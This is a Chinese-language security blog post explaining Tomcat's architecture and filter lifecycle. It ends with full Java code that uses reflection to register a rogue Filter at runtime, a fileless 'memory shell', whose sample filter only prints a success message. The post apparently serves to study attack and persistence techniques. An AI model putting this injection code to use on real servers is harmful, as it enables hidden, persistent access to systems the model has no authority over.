<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">

    
    <title>Tomcat Filter内存马实现 | T1melo0per&#39;blog</title>

    <meta name="description" content="&lt;h1 id=&#34;tomcat基础部分&#34;&gt;&lt;a href=&#34;#tomcat基础部分&#34; class=&#34;headerlink&#34; title=&#34;tomcat基础部分&#34;&gt;&lt;/a&gt;tomcat基础部分&lt;/h1&gt;&lt;h3 id=&#34;Tomcat的主要功能&#34;&gt;&lt;a href=&#34;#Tomcat的主要功能&#34; class=&#34;headerlink&#34; title=&#34;Tomcat的主要功能&#34;&gt;&lt;/a&gt;Tomcat的主要功能&lt;/h3&gt;&lt;p&gt;tomcat作为一个 Web 服务器，实现了两个非常核心的功能：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Http 服务器功能：&lt;/strong&gt; 进行 Socket 通信(基于 TCP/IP)，解析 HTTP 报文&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Servlet 容器功能：&lt;/strong&gt; 加载和管理 Servlet，由 Servlet 具体负责处理 Request 请求">
    <meta name="keywords" content="">

    

    <meta property="og:locale" content="en" />
    <meta property="og:type" content="article" />
    <meta property="og:title" content= "Tomcat Filter内存马实现 | T1melo0per&#39;blog"  />
    <meta property="og:description" content= "&lt;h1 id=&#34;tomcat基础部分&#34;&gt;&lt;a href=&#34;#tomcat基础部分&#34; class=&#34;headerlink&#34; title=&#34;tomcat基础部分&#34;&gt;&lt;/a&gt;tomcat基础部分&lt;/h1&gt;&lt;h3 id=&#34;Tomcat的主要功能&#34;&gt;&lt;a href=&#34;#Tomcat的主要功能&#34; class=&#34;headerlink&#34; title=&#34;Tomcat的主要功能&#34;&gt;&lt;/a&gt;Tomcat的主要功能&lt;/h3&gt;&lt;p&gt;tomcat作为一个 Web 服务器，实现了两个非常核心的功能：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Http 服务器功能：&lt;/strong&gt; 进行 Socket 通信(基于 TCP/IP)，解析 HTTP 报文&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Servlet 容器功能：&lt;/strong&gt; 加载和管理 Servlet，由 Servlet 具体负责处理 Request 请求" />
    <meta property="og:url" content="https://t1melo0per.github.io/2022/04/27/memshell-filter/index.html" />
    <meta property="og:site_name" content="" />
    <meta property="article:author" content="John Doe" />
    <meta property="article:publisher" content="" />
    <meta property="og:description" content="&lt;h1 id=&#34;tomcat基础部分&#34;&gt;&lt;a href=&#34;#tomcat基础部分&#34; class=&#34;headerlink&#34; title=&#34;tomcat基础部分&#34;&gt;&lt;/a&gt;tomcat基础部分&lt;/h1&gt;&lt;h3 id=&#34;Tomcat的主要功能&#34;&gt;&lt;a href=&#34;#Tomcat的主要功能&#34; class=&#34;headerlink&#34; title=&#34;Tomcat的主要功能&#34;&gt;&lt;/a&gt;Tomcat的主要功能&lt;/h3&gt;&lt;p&gt;tomcat作为一个 Web 服务器，实现了两个非常核心的功能：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Http 服务器功能：&lt;/strong&gt; 进行 Socket 通信(基于 TCP/IP)，解析 HTTP 报文&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Servlet 容器功能：&lt;/strong&gt; 加载和管理 Servlet，由 Servlet 具体负责处理 Request 请求" />
    <meta name="twitter:title" content="Tomcat Filter内存马实现 | T1melo0per&#39;blog"/>
    <meta name="twitter:description" content="&lt;h1 id=&#34;tomcat基础部分&#34;&gt;&lt;a href=&#34;#tomcat基础部分&#34; class=&#34;headerlink&#34; title=&#34;tomcat基础部分&#34;&gt;&lt;/a&gt;tomcat基础部分&lt;/h1&gt;&lt;h3 id=&#34;Tomcat的主要功能&#34;&gt;&lt;a href=&#34;#Tomcat的主要功能&#34; class=&#34;headerlink&#34; title=&#34;Tomcat的主要功能&#34;&gt;&lt;/a&gt;Tomcat的主要功能&lt;/h3&gt;&lt;p&gt;tomcat作为一个 Web 服务器，实现了两个非常核心的功能：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Http 服务器功能：&lt;/strong&gt; 进行 Socket 通信(基于 TCP/IP)，解析 HTTP 报文&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Servlet 容器功能：&lt;/strong&gt; 加载和管理 Servlet，由 Servlet 具体负责处理 Request 请求"/>
    <script type="application/ld+json">
        {
            "description": "&lt;h1 id=&#34;tomcat基础部分&#34;&gt;&lt;a href=&#34;#tomcat基础部分&#34; class=&#34;headerlink&#34; title=&#34;tomcat基础部分&#34;&gt;&lt;/a&gt;tomcat基础部分&lt;/h1&gt;&lt;h3 id=&#34;Tomcat的主要功能&#34;&gt;&lt;a href=&#34;#Tomcat的主要功能&#34; class=&#34;headerlink&#34; title=&#34;Tomcat的主要功能&#34;&gt;&lt;/a&gt;Tomcat的主要功能&lt;/h3&gt;&lt;p&gt;tomcat作为一个 Web 服务器，实现了两个非常核心的功能：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Http 服务器功能：&lt;/strong&gt; 进行 Socket 通信(基于 TCP/IP)，解析 HTTP 报文&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Servlet 容器功能：&lt;/strong&gt; 加载和管理 Servlet，由 Servlet 具体负责处理 Request 请求",
            "author": { "@type": "Person", "name": "John Doe" },
            "@type": "BlogPosting",
            "url": "https://t1melo0per.github.io/2022/04/27/memshell-filter/index.html",
            "publisher": {
            "@type": "Organization",
            "logo": {
                "@type": "ImageObject",
                "url": "https://T1melo0per.github.ioundefined"
            },
            "name": "John Doe"
            },
            "headline": "Tomcat Filter内存马实现 | T1melo0per&#39;blog",
            "datePublished": "2022-04-26T17:49:02.000Z",
            "mainEntityOfPage": {
                "@type": "WebPage",
                "@id": "https://t1melo0per.github.io/2022/04/27/memshell-filter/index.html"
            },
            "@context": "http://schema.org"
        }
    </script>




    

    

    

    

    

    

    

    
<link rel="stylesheet" href="/dist/build.css?v=1646451311888.css">


    
<link rel="stylesheet" href="/dist/custom.css?v=1646451311888.css">


    <script>
        window.isPost = true
        window.aomori = {
            
            
            
        }
        window.aomori_logo_typed_animated = false
        window.aomori_search_algolia = false

    </script>

<meta name="generator" content="Hexo 5.4.2"></head>

<body>

    <div class="container">
    <header class="header">
        <div class="header-type">
            
            <div class="header-type-inner">
                
                    <a class="header-type-title" href="/">T1melo0per&#39;blog</a>
                
    
                
            </div>
        </div>
        <div class="header-menu">
            <div class="header-menu-inner">
                
                <a href="/">首页</a>
                
                <a href="/archives">存档</a>
                
                <a href="/friends">工具箱</a>
                
                <a href="/about">关于</a>
                
            </div>
            <div class="header-menu-social">
                
            </div>
        </div>

        <div class="header-menu-mobile">
            <div class="header-menu-mobile-inner" id="mobile-menu-open">
                <i class="icon icon-menu"></i>
            </div>
        </div>
    </header>

    <div class="header-menu-mobile-menu">
        <div class="header-menu-mobile-menu-bg"></div>
        <div class="header-menu-mobile-menu-wrap">
            <div class="header-menu-mobile-menu-inner">
                <div class="header-menu-mobile-menu-close" id="mobile-menu-close">
                    <i class="icon icon-cross"></i>
                </div>
                <div class="header-menu-mobile-menu-list">
                    
                    <a href="/">首页</a>
                    
                    <a href="/archives">存档</a>
                    
                    <a href="/friends">工具箱</a>
                    
                    <a href="/about">关于</a>
                    
                </div>
            </div>
        </div>
    </div>

</div>

    <div class="container">
        <div class="main">
            <section class="inner">
                <section class="inner-main">
                    <div class="post">
    <article id="post-cl2htiew700069zqu9p1u9far" class="article article-type-post" itemscope
    itemprop="blogPost">

    <div class="article-inner">

        
          
        
        
        

        
        <header class="article-header">
            
  
    <h1 class="article-title" itemprop="name">
      Tomcat Filter内存马实现
    </h1>
  

        </header>
        

        <div class="article-more-info article-more-info-post hairline">

            <div class="article-date">
  <time datetime="2022-04-26T17:49:02.000Z" itemprop="datePublished">2022-04-27</time>
</div>

            
            <div class="article-category">
                <a class="article-category-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a>
            </div>
            

            
            <div class="article-tag">
                <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E5%86%85%E5%AD%98%E9%A9%AC/" rel="tag">内存马</a></li></ul>
            </div>
            

            

        </div>

        <div class="article-entry post-inner-html hairline" itemprop="articleBody">
            <h1 id="tomcat基础部分"><a href="#tomcat基础部分" class="headerlink" title="tomcat基础部分"></a>tomcat基础部分</h1><h3 id="Tomcat的主要功能"><a href="#Tomcat的主要功能" class="headerlink" title="Tomcat的主要功能"></a>Tomcat的主要功能</h3><p>tomcat作为一个 Web 服务器，实现了两个非常核心的功能：</p>
<ul>
<li><strong>Http 服务器功能：</strong> 进行 Socket 通信(基于 TCP/IP)，解析 HTTP 报文</li>
<li><strong>Servlet 容器功能：</strong> 加载和管理 Servlet，由 Servlet 具体负责处理 Request 请求<span id="more"></span>
<a target="_blank" rel="noopener" href="https://tuchuangyy.oss-cn-beijing.aliyuncs.com/img/image-20211007190918695.png"><img src="https://t0safeimage.oss-cn-beijing.aliyuncs.com/imgimage-20220105093115-mhkzgxn.png" alt="image.png"></a></li>
</ul>
<p>以上两个功能，分别对应着tomcat的两个核心组件连接器（Connector）和容器（Container），连接器负责对外交流（完成 Http 服务器功能），容器负责内部处理（完成 Servlet 容器功能）。</p>
<p><a target="_blank" rel="noopener" href="https://tuchuangyy.oss-cn-beijing.aliyuncs.com/img/image-20211007191427074.png"><img src="https://t0safeimage.oss-cn-beijing.aliyuncs.com/imgimage-20220105093132-bhrfvdu.png" alt="image.png"></a></p>
<ul>
<li><strong>Server</strong><br>Server 服务器的意思，代表整个 tomcat 服务器，一个 tomcat 只有一个 Server Server 中包含至少一个 Service 组件，用于提供具体服务。</li>
<li><strong>Service</strong><br>服务是 Server 内部的组件，一个Server可以包括多个Service。它将若干个 Connector 组件绑定到一个 Container</li>
<li><strong>Connector</strong><br>称作连接器，是 Service 的核心组件之一，一个 Service 可以有多个 Connector，主要连接客户端请求,用于接受请求并将请求封装成 Request 和 Response，然后交给 Container 进 行处理，Container 处理完之后在交给 Connector 返回给客户端。</li>
<li><strong>Container</strong><br>负责处理用户的 servlet 请求</li>
</ul>
<h3 id="Connector连接器"><a href="#Connector连接器" class="headerlink" title="Connector连接器"></a>Connector连接器</h3><p>连接器主要完成以下三个核心功能：</p>
<ul>
<li>socket 通信，也就是网络编程</li>
<li>解析处理应用层协议，封装成一个 Request 对象</li>
<li>将 Request 转换为 ServletRequest，将 Response 转换为 ServletResponse</li>
</ul>
<p>以上分别对应三个组件 EndPoint、Processor、Adapter 来完成。Endpoint 负责提供请求字节流给Processor，Processor 负责提供 Tomcat 定义的 Request 对象给 Adapter，Adapter 负责提供标准的 ServletRequest 对象给 Servlet 容器。</p>
<p><a target="_blank" rel="noopener" href="https://tuchuangyy.oss-cn-beijing.aliyuncs.com/img/image-20211007193016382.png"><img src="https://t0safeimage.oss-cn-beijing.aliyuncs.com/imgimage-20220105093147-8y72tb9.png" alt="image.png"></a></p>
<h3 id="Container容器"><a href="#Container容器" class="headerlink" title="Container容器"></a>Container容器</h3><p>Container组件又称作Catalina，其是Tomcat的核心。在Container中，有4种容器，分别是Engine、Host、Context、Wrapper。这四种容器成套娃式的分层结构设计。</p>
<p><a target="_blank" rel="noopener" href="https://tuchuangyy.oss-cn-beijing.aliyuncs.com/img/image-20211007193651356.png"><img src="https://t0safeimage.oss-cn-beijing.aliyuncs.com/imgimage-20220105093202-owcqe6d.png" alt="image.png"></a></p>
<p>四种容器的作用：</p>
<ul>
<li>Engine<br>表示整个 Catalina 的 Servlet 引擎，用来管理多个虚拟站点，一个 Service 最多只能有一个 Engine，但是一个引擎可包含多个 Host</li>
<li>Host<br>代表一个虚拟主机，或者说一个站点，可以给 Tomcat 配置多个虚拟主机地址，而一个虚拟主机下可包含多个 Context</li>
<li>Context<br>表示一个 Web 应用程序，每一个Context都有唯一的path，一个Web应用可包含多个 Wrapper</li>
<li>Wrapper<br>表示一个Servlet，负责管理整个 Servlet 的生命周期，包括装载、初始化、资源回收等</li>
</ul>
<p>如以下图，a.com和b.com分别对应着两个Host</p>
<p><a target="_blank" rel="noopener" href="https://tuchuangyy.oss-cn-beijing.aliyuncs.com/img/image-20211007193847735.png"><img src="https://t0safeimage.oss-cn-beijing.aliyuncs.com/imgimage-20220105093228-gc9w0n3.png" alt="image.png"></a></p>
<p>Tomcat运行流程结构：</p>
<p><a target="_blank" rel="noopener" href="https://tuchuangyy.oss-cn-beijing.aliyuncs.com/img/image-20211007192234870.png"><img src="https://t0safeimage.oss-cn-beijing.aliyuncs.com/imgimage-20220105093241-upimfr9.png" alt="image.png"></a></p>
<p><img src="https://t0safeimage.oss-cn-beijing.aliyuncs.com/imgimage-20220107134305-jhhw2fs.png" alt="image.png"></p>
<h1 id="Filter生命周期分析"><a href="#Filter生命周期分析" class="headerlink" title="Filter生命周期分析"></a>Filter生命周期分析</h1><p>通过上面的基础知识可以看到，Tomcat的web启动后在初始化Context的时候会调用StandardContext来实现部分功能，其中初始化每个Filter就是在这里完成的</p>
<p><img src="https://t0safeimage.oss-cn-beijing.aliyuncs.com/imgimage-20220107142130-nlfduu1.png" alt="image.png"></p>
<p>FilterDef相关结构</p>
<p><img src="https://t0safeimage.oss-cn-beijing.aliyuncs.com/imgimage-20220107142323-1dtrqul.png" alt="image.png"></p>
<p>调试查看FilterDef在调用过程中主要存储的是FilterName和相关实现类</p>
<p><img src="https://t0safeimage.oss-cn-beijing.aliyuncs.com/imgimage-20220107142528-meryfuc.png" alt="image.png"></p>
<p>因为过滤器通常会匹配路由进行触发，但通过<code>StandardContext-&gt;filterStart</code>并没有发现将路由+过滤器配置进行初始化。</p>
<p>通过调试发现<code>FilterMap</code>中会将Filter和路由进行匹配关联</p>
<p><img src="https://t0safeimage.oss-cn-beijing.aliyuncs.com/imgimage-20220107144350-xz9houa.png" alt="image.png"></p>
<p>跟踪调用链发现FilterMaps在<code>ContextConfig</code>进行了初始化</p>
<p><img src="https://t0safeimage.oss-cn-beijing.aliyuncs.com/imgimage-20220107144814-oll257j.png" alt="image.png"></p>
<p>分析到现在已经可以推断出Filter从初始化到应用这个过程强关联的几个类：<code>FilterDef</code>  <code>FilterConfig</code>  <code>FilterMap</code></p>
<h1 id="Filter调用链分析"><a href="#Filter调用链分析" class="headerlink" title="Filter调用链分析"></a>Filter调用链分析</h1><p>在自定义中Filter下断点，调试过程中发现<code>filterChain</code>在创建时会对访问路径和过滤器注册的路由进行匹配</p>
<p><code>org/apache/catalina/core/StandardWrapperValve.class</code></p>
<p><img src="https://t0safeimage.oss-cn-beijing.aliyuncs.com/imgimage-20220105102052-99u26tb.png" alt="image.png"></p>
<p>跟进    <code>createFilterChain</code>发现程序获取<code>filterMaps</code>后会判断访问的路径是否符合filter的拦截路径，如果匹配则会执行<code>addFilter</code></p>
<p><img src="https://t0safeimage.oss-cn-beijing.aliyuncs.com/imgimage-20220107151550-w9ut70z.png" alt="image.png"></p>
<p>在进行路径匹配时会调用FilterMap来获取过滤器注册的路由，证明前面的推断并没有错</p>
<p><img src="https://t0safeimage.oss-cn-beijing.aliyuncs.com/imgimage-20220107152249-ca1esju.png" alt="image.png"></p>
<p>获取filterChain最后会进行doFilter来执行Filter的逻辑</p>
<p><img src="https://t0safeimage.oss-cn-beijing.aliyuncs.com/imgimage-20220105102349-n5boefa.png" alt="image.png"></p>
<p>所以构造Filter内存马的思路为：构建恶意Filter，实现<code>FilterDef</code> <code>FilterMap</code> <code>FilterConfig</code> 并将 <code>FilterConfig</code>注册到<code>FilterConfigs</code></p>
<p>通过上面对Filter生命周期分析，要实现动态注册恶意Filter，首先需要获取StandardContext</p>
<p>由于没有接口可以直接获取到，所以这里需要用到反射来实现StandardContext</p>
<pre><code class="java">ServletContext servletContext = request.getSession().getServletContext();
Field field_ApplicationContext = servletContext.getClass().getDeclaredField(&quot;context&quot;);
field_ApplicationContext.setAccessible(true);
ApplicationContext applicationContext = (ApplicationContext) field_ApplicationContext.get(servletContext);
  
Field field_StandardContext = applicationContext.getClass().getDeclaredField(&quot;context&quot;);
field_StandardContext.setAccessible(true);
StandardContext standardContext = (StandardContext) field_StandardContext.get(applicationContext);
</code></pre>
<p>相关代码</p>
<pre><code class="java">package com.testFilter;

import org.apache.catalina.Context;
import org.apache.catalina.core.ApplicationContext;
import org.apache.catalina.core.ApplicationFilterConfig;
import org.apache.catalina.core.StandardContext;
import org.apache.tomcat.util.descriptor.web.FilterDef;
import org.apache.tomcat.util.descriptor.web.FilterMap;

import javax.servlet.*;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.util.Map;

@WebServlet(name = &quot;TestMemshell&quot;)
public class TestMemshell extends HttpServlet &#123;
    protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException &#123;
        ServletContext servletContext = request.getSession().getServletContext();
        try &#123;
            String memshellName = &quot;shell&quot;;
            Field field_ApplicationContext = servletContext.getClass().getDeclaredField(&quot;context&quot;);
            field_ApplicationContext.setAccessible(true);
            ApplicationContext applicationContext = (ApplicationContext) field_ApplicationContext.get(servletContext);

            Field field_StandardContext = applicationContext.getClass().getDeclaredField(&quot;context&quot;);
            field_StandardContext.setAccessible(true);
            StandardContext standardContext = (StandardContext) field_StandardContext.get(applicationContext);

            Field field_FilterConfigs = standardContext.getClass().getDeclaredField(&quot;filterConfigs&quot;);
            field_FilterConfigs.setAccessible(true);
            Map filterConfigs = (Map) field_FilterConfigs.get(standardContext);
            if(filterConfigs.get(memshellName)==null)&#123;
                Filter filter = new Filter() &#123;
                    @Override
                    public void init(FilterConfig filterConfig) throws ServletException &#123;

                    &#125;

                    @Override
                    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException &#123;
                        response.getWriter().write(&quot;memshell injectsucc&quot;);
                        return;
                    &#125;

                    @Override
                    public void destroy() &#123;

                    &#125;
                &#125;;
        //实现FilterDef
                FilterDef filterDef = new FilterDef();
                filterDef.setFilter(filter);
                filterDef.setFilterName(memshellName);
                filterDef.setFilterClass(filter.getClass().getName());
                standardContext.addFilterDef(filterDef);
        //实现FilterMap
                FilterMap filterMap = new FilterMap();
                filterMap.addURLPattern(&quot;/shell&quot;);
                filterMap.setFilterName(memshellName);
                System.out.println(DispatcherType.REQUEST.name());
                filterMap.setDispatcher(DispatcherType.REQUEST.name());
                standardContext.addFilterMapBefore(filterMap);
        // 
                Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class,FilterDef.class);
                constructor.setAccessible(true);
                FilterConfig filterConfig = (FilterConfig) constructor.newInstance(standardContext,filterDef);
                filterConfigs.put(memshellName,filterConfig);

            &#125;else&#123;
                response.getWriter().write(&quot;memshell injected&quot;);
            &#125;

        &#125; catch (NoSuchFieldException | IllegalAccessException | NoSuchMethodException e) &#123;
            e.printStackTrace();
        &#125; catch (InvocationTargetException e) &#123;
            e.printStackTrace();
        &#125; catch (InstantiationException e) &#123;
            e.printStackTrace();
        &#125;

    &#125;

    protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException &#123;
        doPost(request,response);
    &#125;
&#125;
</code></pre>

        </div>

    </div>

    

    

    
  <div class="article-refer hairline">
    <h3>文章参考文献</h3>
    
    <p>
      <a target="_blank" rel="nofollow" href="https://blog.csdn.net/yuxiangaaaaa/article/details/72867037">Tomcat启动过程原理详解</a>
    </p>
    
  </div>
  

    

    

    
<nav class="article-nav">
  
  
    <a href="/2022/04/27/basereflect/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-caption">precedente</div>
      <div class="article-nav-title">Java基础 反射</div>
    </a>
  
</nav>


    <section class="share">
        <div class="share-title">share</div>
        <a class="share-item" target="_blank"
            href="https://twitter.com/share?text=Tomcat Filter内存马实现 - T1melo0per'blog&url=https://t1melo0per.github.io/2022/04/27/memshell-filter/">
            <box-icon type='logo' name='twitter'></box-icon>
        </a>
        <a class="share-item" target="_blank"
            href="https://www.facebook.com/sharer.php?title=Tomcat Filter内存马实现 - T1melo0per'blog&u=https://t1melo0per.github.io/2022/04/27/memshell-filter/">
            <box-icon name='facebook-square' type='logo' ></box-icon>
        </a>
        <!-- <a class="share-item" target="_blank"
            href="https://service.weibo.com/share/share.php?title=Tomcat Filter内存马实现 - T1melo0per'blog&url=https://t1melo0per.github.io/2022/04/27/memshell-filter/&pic=">
            <div class="n-icon n-icon-weibo"></div>
        </a> -->
    </section>

</article>
















</div>
                </section>
            </section>

            
            <aside class="sidebar ">
                


<div class="widget" id="widget">
    
      
  <div class="widget-wrap">
    <div class="widget-inner">
      <div class="toc post-toc-html"></div>
    </div>
  </div>

    
      
  <div class="widget-wrap widget-cate">
    <div class="widget-title"><span>Categories</span></div>
    <div class="widget-inner">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a></li></ul>
    </div>
  </div>


    
      
  <div class="widget-wrap widget-tags">
    <div class="widget-title"><span>Tags</span></div>
    <div class="widget-inner">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/shiro/" rel="tag">shiro</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%86%85%E5%AD%98%E9%A9%AC/" rel="tag">内存马</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8F%8D%E5%B0%84/" rel="tag">反射</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="tag">反序列化</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%9F%BA%E7%A1%80/" rel="tag">基础</a></li></ul>
    </div>
  </div>


    
      
  <div class="widget-wrap widget-recent-posts">
    <div class="widget-title"><span>Recent Posts</span></div>
    <div class="widget-inner">
      <ul>
        
          <li>
            <a href="/2022/04/27/memshell-filter/">Tomcat Filter内存马实现</a>
          </li>
        
          <li>
            <a href="/2022/04/27/basereflect/">Java基础 反射</a>
          </li>
        
          <li>
            <a href="/2022/04/26/CVE-2016-4437/">CVE-2016-4437 Shiro反序列化分析</a>
          </li>
        
      </ul>
    </div>
  </div>

    
      
  <div class="widget-wrap widget-archive">
    <div class="widget-title"><span>Archive</span></div>
    <div class="widget-inner">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/">2022</a></li></ul>
    </div>
  </div>


    
</div>

<div id="backtop"><i class="icon icon-arrow-up"></i></div>
            </aside>
            
        </div>
    </div>

    <footer class="footer">
    <div class="footer-wave">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1440 320"><path fill="#3c4859" fill-opacity="1" d="M0,160L60,181.3C120,203,240,245,360,240C480,235,600,181,720,186.7C840,192,960,256,1080,261.3C1200,267,1320,213,1380,186.7L1440,160L1440,320L1380,320C1320,320,1200,320,1080,320C960,320,840,320,720,320C600,320,480,320,360,320C240,320,120,320,60,320L0,320Z"></path></svg>
    </div>

    <!-- Please do not remove this -->
    <!-- 开源不易，请勿删除 -->
    <div class="footer-wrap">
        <div class="footer-inner"> 
            T1melo0per&#39;blog &copy; 2022<br>
            Powered By Hexo · Theme By <a href="https://linhong.me/" target="_blank">Aomori</a> · <a href="https://github.com/lh1me/hexo-theme-aomori" target="_blank">Github</a>
        </div>
    </div>

</footer>






<script src="/dist/build.js?1646451311888.js"></script>


<script src="/dist/custom.js?1646451311888.js"></script>













</body>

</html>